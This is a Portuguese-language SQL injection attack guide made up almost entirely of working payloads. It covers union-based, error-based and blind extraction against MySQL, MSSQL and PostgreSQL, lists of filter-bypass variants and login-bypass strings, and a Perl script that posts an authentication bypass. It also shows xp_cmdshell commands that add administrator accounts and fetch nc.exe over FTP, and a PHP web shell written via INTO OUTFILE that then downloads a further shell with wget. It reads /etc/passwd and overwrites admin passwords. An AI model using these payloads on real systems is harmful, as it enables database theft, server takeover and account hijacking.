http://www.site.com/buy.php?id=1' http://www.site.com/buy.php?id='1 http://www.site.com/buy.php?id=-1' http://www.site.com/buy.php?id=1`
http://www.site.com/buy.php?id='1&dog;catid='2
http://www.site.com/buy.php?id=1 order by 1-- <-- sem erro http://www.site.com/buy.php?id=1 order by 2-- <-- sem erro http://www.site.com/buy.php?id=1 order by 3-- <-- sem erro http://www.site.com/buy.php?id=1 order by 4-- <-- sem erro http://www.site.com/buy.php?id=1 order by 5-- <-- com erro
http://www.site.com/buy.php?id=1 order by 1/ http://www.site.com/buy.php?id=1 order by 1 http://www.site.com/buy.php?id=1 order by 1--
http://www.site.com/buy.php?id=1+order+by+1-- http://www.site.com/buy.php?id=1%20order%20by%201-- http://www.site.com/buy.php?id=1 order by 1
--> http://www.site.com/dir/accountlevel?id=1032%00' --> http://www.site.com/dir/accountlevel?id=1032%27 --> http://www.site.com/dir/accountlevel?id=1032%00%27%00 --> http://www.site.com/dir/accountlevel?id=%271032%00 --> http://www.site.com/dir/accountlevel?id=%00%00%2710325%00
--> site.com/news.php?id=9 order by 10000000000-- [Sem Erro]
--> site.com/news.php?id=9' order by 10000000--+ [Com Erro]
--> http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+
http://www.site.com/buy.php?id=1 union select 1,2,3,4-- http://www.site.com/buy.php?id=1 union all select 1,2,3,4--
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
("404 forbidden you do not have permission to access to this webpage")
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
http://www.site.com/buy.php?id=1 union select 1,2,@@version,4-- <-- Mostra a versão
http://www.site.com/buy.php?id=1 union select 1,2,version(),4-- <-- Mostra a versão
http://www.site.com/buy.php?id=1 union select 1,2,@@hostname,4-- <-- Mostra o hostname
http://www.site.com/buy.php?id=1 union select 1,2,user(),3,4-- <-- Mostra o user
http://www.site.com/buy.php?id=1 union select 1,2,database(),3,4-- <-- Mostra a current-db
http://www.site.com/buy.php?id=1 union select 1,2,@@datadir,3,4-- <-- Mostra o DIR do mysql
http://www.site.com/buy.php?id=1 union select 1,2,group_concat(version(),user(),@@hostaname,@@datadir),3,4
http://www.site.com/buy.php?id=1 union select 1,2,group_concat(version(),0x3a,user(),0x3a,@@hostaname,0x3a,@@datadir),3,4--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,unhex(hex(@@version)),4--
http://www.site.com/buy.php?id=-1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata--
http://www.site.com/buy.php?id=-1 union select 1,2,group_concat(database()),4-- http://www.site.com/buy.php?id=-1 union select 1,2,concat(database()),4-- http://www.site.com/buy.php?id=-1 union select 1,2,database(),4--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 15,1-- http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1-- http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 45,1--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="nomedatabela"--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x6e6f6d656461746162656c61--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=CHAR(97, 100, 109, 105, 110)--
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(user,0x3a,pass,0x3a,email),3,4 FROM admin--
+and(select+1+FROM(select count(*),concat((select(select concat (version())) FROM Information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select(select concat (database())) FROM Information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select(select (SELECT concat (0x7e,0x27,count(table_name),0x27,0x7e) FROM 'Information_schema'.tables WHERE table_schema=AQUI VC COLOCA O NOME DA DB EM HEX)) LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
admin = 0x61646d696e
+and(select+1+FROM(select count(*),concat((select(select (SELECT concat (0x7e,0x27,count(table_name),0x27,0x7e) FROM 'Information_schema'.tables WHERE table_schema=0x61646d696e)) LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select(select (SELECT concat (0x7e,0x27,count(table_name),0x27,0x7e) FROM 'Information_schema'.tables WHERE table_schema=0x61646d696e AND table_name=0x65321233e)) LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
+and(select+1+FROM(select count(*),concat((select+concat(0x3a,password)+from+users+LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
http://site.com/index.php?id=1+and(select+1+FROM(select count(*),concat((select+concat(0x3a,username)+from+users+LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
WAF significa Web Application Firewall. É amplamente utilizado hoje em dia para detectar e defender contra ataques de SQL Injection e Cross-Site Scripting (XSS).
Quando o WAF detecta qualquer entrada maliciosa do usuário final, responde com 403 Proibido, 406 Não Aceitável ou algum tipo de erro personalizado.
Então, o que fazer a seguir? nós não podemos fazer a injeção normal correto? Bem, é hora de usar várias técnicas de bypass.
A maioria dos WAFs filtra apenas letras minúsculas ou palavras-chave fixas. Podemos facilmente contornar esse tipo de WAF usando alternância de maiúsculas e minúsculas.
Se union select é proibido , podemos testar então UNION SELECT. E se ambos não funcionarem, podemos tentar misturar ambos. Assim: UniOn seLeCt
Comentários SQL realmente nos ajudam em várias situações. Eles desempenham um papel importante para contornar as restrições de alguns WAFs.
Alguns WAF’s filtram palavras como /union\sselect/ig Podemos ignorar esses filtros usando comentários incorporados na maioria das vezes.
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--
De qualquer forma, estávamos falando sobre palavras-chave filtradas. Então, isso não significa que waf só está filtrando union select. Talvez esteja filtrando todas palavras chaves de SQL como table_name, column_name etc Então, talvez seja necessário aplicar esses comentários na linha sobre as palavras-chave também.
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--
As vezes WAF remove toda palavra-chave da consulta e executa como erro.
http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--
De qualquer forma, depende do cenário. Eu estou apenas dando uma ideia geral. O resto é com você: a forma como vai usar depende apenas de você.
Às vezes o WAF pode filtrar o espaço em branco que estamos usando entre palavras-chave. Na maioria das vezes usamos os espaços, mas o espaço não é o único caractere em branco que podemos usar na injeção SQL. Temos algumas outras opções também, por exemplo: o + e o %20 são usados como espaço; mais exemplos são: %09 %0A %0B %0C %0D **%A0*
union%0Bselect%0B1,2,3--
union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29
union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529
http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--
%55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ ///*!12345UNION SELECT*/// ///*!50000UNION SELECT*/// //UNION///*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un//ion+se//lect uni%0bon+se%0blect %2f%2funion%2f%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ //union//select/**/ //uNIon//sEleCt/**/ ///*!union*////*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT
/*!union*/ /*!select*/ 1,2,3,4,5--
http://www.site.com.br/index.php?id=15 /*!union*/ /*!select*/ 1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15 UnIoN SeLeCT 1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15 UNIunionON SELselectECT 1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15 UnION/**/SElecT 1,2,3,4,5#continue xploiting...
+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4,5
/*!union*/ /*!select*/ 1,2,3,4,5
- Hex Encoded for URL: %2f%2a%21%75%6e%69%6f%6e%2a%2f%20%2f%2a%21%73%65%6c%65%63%74%2a%2f%20%31%2c%32%2c%33%2c%34%2c%35
- Hex Dashed: 2f-2a-21-75-6e-69-6f-6e-2a-2f-20-2f-2a-21-73-65-6c-65-63-74-2a-2f-20-31-2c-32-2c-33-2c-34-2c-35
- Hex Spaced: 2f 2a 21 75 6e 69 6f 6e 2a 2f 20 2f 2a 21 73 65 6c 65 63 74 2a 2f 20 31 2c 32 2c 33 2c 34 2c 35
- Hex: 2f2a21756e696f6e2a2f202f2a2173656c6563742a2f20312c322c332c342c35
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5...
/*!union*/ /*!select*/ 1,2,3,4,5...
+-------------------------------+ | COMUM ++++++ ALTERNATIVO | | | | |@@version | version() | |concat() | concat_ws() | |group_concat() | concat_ws() | +-------------------------------+
http://www.site.com.br/index.php?id=15+uni*on+sel*ect+1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15+union+select+1,2,3,4,5#continue xploiting...
http://www.site.com.br/index.php?id=15+(uNioN)+(sElECt)1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15+(uNioN+SeleCT)+1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15+(UnI)(oN)+(SeL)(ecT)+1,2,3,4,5#continue xploiting....
http://www.site.com.br/index.php?id=15+union (select 1,2,3,4,5)#continue xploiting....
Illegal Mix of Collation
Union Illegal Mix of Collation
Cast(): Cast(Expressão AS Tipo) Cast(@@version,0x3a,database() AS binary) Cast(@@version AS binary) convert(): convert(@@version using ascii) HEX/ UNHEX(): unhex(hex(@@version,0x3a,database())) unhex(hex(version())) Compress/uncompress: uncompress(compress(@@version)) uncompress(compress(version())) encode/decode: decode(encode(@@version,1),1) decode(encode(version(),1),1) Encriptação AES: AES_DECRYPT(AES_ESCRYPT(@@version,1),1) AES_DECRYPT(AES_ESCRYPT(version(),1),1)
/?id=1+un//ion+sel//ect+1,2,3--
union+select+1,2,3--
/?id=1;union+select+pwd+from+users--
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users (QUERY VALIDA)
// Illustrative vulnerable pattern: the raw $_GET values are concatenated
// straight into the SQL text, so each request parameter is a separate
// untrusted insertion point and nothing separates data from query structure.
// The defensive fix is to bind the values as query parameters (or at minimum
// validate them as integers) instead of building the string.
// Query() is assumed to execute its argument as SQL - it is not defined here.
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
// Same pattern with a third unescaped parameter in the LIMIT clause.
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
/?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
substring() -> mid(), substr(), etc ascii() -> hex(), bin(), etc benchmark() -> sleep()
select user from mysql.user where user = 'user' OR mid(password,1,1)='*' select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a') select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]' select user from mysql.user where user = 'user' OR mid(password,1,1) like '*' select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]' select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42 select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1 select user from mysql.user where user = 'user' OR position(0x2a in password)=1 select user from mysql.user where user = 'user' OR locate(0x2a,password)=1 select user from mysql.user where user = 'user' OR substr(password,1,1)=0x2a select user from mysql.user where user = 'user' OR substring(password,1,1)=0x2a
substring((select 'password'),1,1) = 0x70 substr((select 'password'),1,1) = 0x70 mid((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1 (TRUE para 1,se password password é maior que 0x71 [NUMERAÇÃO ASCII]) strcmp(left('password',1), 0x70) = 0 (TRUE para 0, se password e 0x70 são iguais strcmp(left('password',1), 0x71) = -1(TRUE para -1, se password é menor que 0x71 [NUMERAÇÃO ASCII])
false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)%2B112233 false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x61)%2B112233 true: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x62)%2B112233 Primeiro caractere da hash é = B false: index.php?uid=strcmp(left((select//hash//from//users//limit/**/0,1),2),0x6240)%2B112233 true: index.php?uid=strcmp(left((select//hash//from//users//limit/**/0,1),2),0x6241)%2B112233 Segundo caractere da hash é = A
and 1 or 1 and 1=1 and 2<3 and 'a'='a' and 'a'<>'b' and char(32)=' ' and 3<=2 and 5<=>4 and 5<=>5 and 5 is null or 5 is not null
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1 But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1 But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1) But allows: /?id=mid((1),1,1)
Forbid:/?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74 But allows:/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+and+5=6 But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members But allows: /?id=1;delete members
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark after the ID integer '5' '. index.asp, line 30
www.target.com/index.asp?id=1 and 1=1-- Carrega normal
www.target.com/index.asp?id=1 and 1=2-- Mssql Erro
Se com 1=2 a página carregar perfeitamente, pode ser necessário usar (string) '+and+1=1--+-
+and+1=convert(int,@@version)--
www.target.com/index.asp?id=1'+and+1=convert(int,@@version)--
+and+1=convert(int,db_name())--
www.target.com/index.asp?id=1'+and+1=convert(int,db_name())--
'+and+1=convert(int,user_name())--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+-
+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('table1')))--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('table1')))--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('table1','table2')))--
+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'))--
www.target.com/index.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'))--
Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'username' to data type int. index.asp, line 30
+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'+and+column_name+not+in+('username')))--
www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='table1'+and+column_name+not+in+('username')))--
+and+1=convert(int,(select+top+1+username+from+table1))--
Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'admin@site' to data type int. index.asp, line 30
+and+1=convert(int,(select+top+1+password+from+table1))--
www.target.com/index.asp?id=1'+and+1=convert(int,(select+top+1+username+from+table1))--
Microsoft OLE DB Provider for SQL Server error '80040e07' Conversion failed when converting the nvarchar value 'adminPass123' to data type int. index.asp, line 30
select load_file(nome_do_arquivo_em_hex_0x61)
select '<?php phpinfo(); ?>' INTO OUTFILE '/home/site/public_html/out.php'
set tabela update coluna='novo_valor'
http://site.com/index.php?option=com_user&view=reset
http://site.com/index.php?option=com_user&view=reset&layout=confirm
http://site.com/wp-login.php?action=lostpassword
http://site.com/wp-login.php?action=rp&key=Coloque seu codigo de ativação aqui&login=Coloque o referente user aqui
---------------------------------------- Username | ' or 1='1 | | | ---------------------------------------- ---------------------------------------- Password | xxxxxxxxx | | | ----------------------------------------
' or 1='1 <--- mais usada hi ‘ ou 1=1 – hi ‘ ou ‘ a’='a hi ‘) ou (‘ a’='a hi”) ou (“a”=”a admin ‘ – - ‘ ou 0=0 – “ou 0=0 – ou 0=0 – ‘ or ‘ 1 b’ or ‘ 1=’ ‘ or ’1 ‘ or ‘| ‘ or ‘a’='a ‘ or ”=’ ‘ or 1=1– ‘) or (‘a’='a ‘ or ’1′=’1 ‘ ou 0=0 # “ou 0=0 # ou 0=0 # ‘ ou ‘ x’='x “ou” x”=”x ‘) ou (‘ x’='x “ou” a”=”a ‘) ou (‘ a’='a “) ou (“a”=”a hi “ou” a”=”a hi “ou 1=1 – ‘ ou 1=1 – “ou 1=1 – ou 1=1 – ‘ ou a=a – ‘ ou 1=1 – “ou 1=1 – ou 1=1 – ‘ ou a=a –
#!/usr/bin/env perl
use common::sense;
use WWW::Curl::Easy;

# Thin WWW::Curl::Easy wrapper that performs a single request.
#   $url    - request URL
#   $header - copied (default 0) into CURLOPT_HEADER and CURLOPT_NOBODY,
#             so a true value requests headers only
#   $post   - when defined it is sent as CURLOPT_POSTFIELDS; the custom
#             request method is 'POST' for a true value and 'GET' otherwise
# Returns $r (the CURLOPT_WRITEDATA target) when perform() returns 0,
# otherwise 0.
sub cURL {
    my ( $url, $header, $post ) = @_;
    my $curl = WWW::Curl::Easy->new;
    $curl->setopt( CURLOPT_HEADER, $header // 0 );
    $curl->setopt( CURLOPT_NOBODY, $header // 0 );
    $curl->setopt( CURLOPT_URL, $url );
    if(defined $post) {
        $curl->setopt( CURLOPT_CUSTOMREQUEST, $post ? 'POST' : 'GET' );
        $curl->setopt( CURLOPT_POST, 1 );
        $curl->setopt( CURLOPT_POSTFIELDS, $post );
    }
    my $r;
    $curl->setopt( CURLOPT_WRITEDATA, $r );
    return ( $curl->perform == 0 ) ? $r : 0;
}

# Builds the request body from the literal above and prints whatever cURL() returns.
my $xpl = '\' or \'1\'=\'1';
$xpl =~ s/x27/chr(0xbf).chr(0x27)/ge;
say cURL('http://site.com/admin', 1, 'user=site&passwd=' . $xpl);
http://site.com/admin.asp?user=site$passwd=%bf%27'or%20'1='1
http://site.com/admin.asp?max=0+and+sleep(15)
Site vul: www.site.com/vul.asp?id=1'
Mcft OLE DB Provider for ODBC Drivers error '80040e14' [Mcft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
Url:http://site.com/vul.asp?id=system_user--
[Mcft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int.
Url:http://site.com/vul.asp?id=1;drop table sin create table sin (id int identity,nd varchar(1000)) insert into sin exec master..xp_cmdshell 'ip config'--sp_password
Url:http://site.com/vul.asp?id=convert(int,(select top 1 nd from sin where id=1)) --sp_password
Mcft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value ' ' to a column of data type int.
Mcft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : xxx.xxx.xxx.xxx ' to a column of data type int.* Feito isto utilizamos um port scan para verificar quais portas estão abertas: *root@CyberHats:~# nmap xxx.xxx.xxx.xxx Discovered open port 21/tcp on xxx.xxx.xxx.xxx Discovered open port 443/tcp on xxx.xxx.xxx.xxx Discovered open port 80/tcp on xxx.xxx.xxx.xxx Discovered open port 3389/tcp on xxx.xxx.xxx.xxx
Url:http://site.com/vul.asp?id=1;exec master..xp_cmdshell 'net user sin 123456 /add'--sp_password;exec master..xp_cmdshell 'net localgroup administrators sin /add'--sp_password
http://site.com/vul.asp?id=exec master..xp_cmdshell 'echo open ftp.site.com > c:\ftp' --sp_password;exec master..xp_cmdshell 'echo user username >> c:\ftp'--sp_password;exec master..xp_cmdshell 'echo password >> c:\ftp'--sp_password;exec master..xp_cmdshell 'echo get nc.exe >> c:\ftp'--sp_password;exec master..xp_cmdshell 'echo quit >> c:\ftp'--sp_password;exec master..xp_cmdshell 'ftp -i -n -v -s:c:\ftp'--sp_password;exec master..xp_cmdshell 'del c:\ftp'--sp_password
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET /index.php HTTP/1.1 Host: xxx.xxxxxxxxxx.xxx.xx User-Agent: ' union select 1-- --
user_session=ckjs34fsdkj455ygdman3:language_id=1
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET / HTTP/1.1 Connection: Keep-Alive Keep-Alive: 300 Accept: / Host: xxx.xxx.xxx.xxx Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E) Cookie: user_session=ckjs34fsdkj455ygdman3:language_id=1 ' union select 1-- -- <-- aqui tu manda os comandos ;)
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET /admin/index.php HTTP/1.1 Host: xxx.xxx.xxx.xxx X_FORWARDED_FOR :127.0.0.1' or 1=1#
root@CyberHats:~# telnet xxx.xxxxxxxxxx.xxx.xx 80 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. GET /admin/index.php HTTP/1.1 Host: xxx.xxx.xxx.xxx X_FORWARDED_FOR :127.0.0.1'+and+0+order+by+1--+#
Table:admin_login Columns: +-----------+ | id | | login | | senha | +-----------+
http://site.com/index.php?id=1; INSERT INTO admin_login (id,login,senha) values ('10','admin2','21232f297a57a5a743894a0e4a801fc3')-- ~~> com a senha encriptada em MD5
http://site.com/index.php?id=1; INSERT INTO admin_login (id,login,senha) values ('10','admin2','admin')-- ~~> com a senha em texto comum
ID do administrador
Tabela dos logins (Ex:admin_login)
colunas da tabela dos logins (Ex:
+-----------+---------------------------------+ | id | 1 | | login | admin | | senha | 21232f297a57a5a743894a0e4a801fc3| +-----------+---------------------------------+
http://site.com/index.php?id=1; UPDATE admin_login set login='admin',senha='21232f297a57a5a743894a0e4a801fc3' where id=1--
http://site.com/index.php?id=1; UPDATE admin_login set login='admin',senha='admin' where id=1--
http://site.com/index.php?id=1; UPDATE admin_login set senha='21232f297a57a5a743894a0e4a801fc3' where id=1--
select file_priv from mysql.user where user='username' --> onde username deve ser encriptado em Hex (estou usando para isto a hack bar)
http://www.site.com/index.php?id=-1+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365
user=0x637365 == user=username
http://www.site.com/index.php?id=-1+union+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--
SELECT 'CODIGO PEQUENO DA SHELL AQUI ' INTO OUTFILE '/var/www/webshell.php'
http://www.site.com/index.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/webshell.php "
http://www.site.com/webshell.php?cmd=wget www.site.com/suashell.txt; mv suashell.txt shell.php
+union+select+1,LOAD_FILE(0x2f6574632f706173737764)-- /(CODIFICAÇÃO EM HEX)/
+union+select+1,LOAD_FILE(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))-- /(CODIFICAÇÃO EM CHAR)/
http://www.site.com/weshell.php?cmd=net users
http://www.site.com/weshell.php?cmd=net user cyberhats/add
http://www.site.com/weshell.php?cmd=net localgroup administrators cyberhats/add
http://www.site.com/index.php?id=MTU=
http://www.site.com/index.php?id=MTU='
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax ..... (VULNERÁVEL)
group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
MTUrZ3JvdXAgYnkgIDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUw=
http://www.site.com/index.php?id=MTUrZ3JvdXAgYnkgIDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3LDI4LDI5LDMwLDMxLDMyLDMzLDM0LDM1LDM2LDM3LDM4LDM5LDQwLDQxLDQyLDQzLDQ0LDQ1LDQ2LDQ3LDQ4LDQ5LDUw=
Unknow column '11'* --> Ou seja, o site possui 10 colunas (sempre uma anterior ao resultado exibido, pois o erro ocorreu em 11, ou seja, ela não existe.) 4- Verificando qual coluna está vulnerável: *UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
http://www.site.com/index.php?id=MTUrVU5JT04gU0VMRUNUIDEsMiwzLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1=
http://www.site.com/index.php?id=15+/*!12345UnIon*/+/*!12345SelEct*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
MTUrLyohMTIzNDVVbklvbiovKy8qITEyMzQ1U2VsRWN0Ki8rMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTU=
http://www.site.com/index.php?id=MTUrLyohMTIzNDVVbklvbiovKy8qITEyMzQ1U2VsRWN0Ki8rMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTU=
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit N,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit N,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
users ==> 7573657273
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x7e,COLUMN_NAME_2) as char),0x7e)) from DATABASENAME.TABLENAME limit N,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
COLUMN_NAME_1 && COLUMN_NAME_2 admin && senha
DATABASENAME site_db TABLENAME users limit N,1 1,1
and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin,0x3a,senha) as char),0x3a)) from site_db.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
http://www.site.com/code?id=10' ERROR !
order by 1-- NO ERROR order by 2-- N0 ERROR order by 3-- ERRO !!!
http://www.site.com/code?id=10 union select NULL,NULL <-- se carregar normalmente é porque não é error-based e é PostgreSQL.
http://www.site.com/code?id=10 union select NULL,VERSION()
http://www.site.com/code?id=-10 union select NULL,VERSION()
http://www.site.com/code?id=-10 union select NULL,CURRENT_DATABASE()
http://www.site.com/code?id=-10 union select NULL,datname from pg_database
http://www.site.com/code?id=-10 union select NULL,tablename from pg_tables where schemaname='NOME_DA_DATABASE'
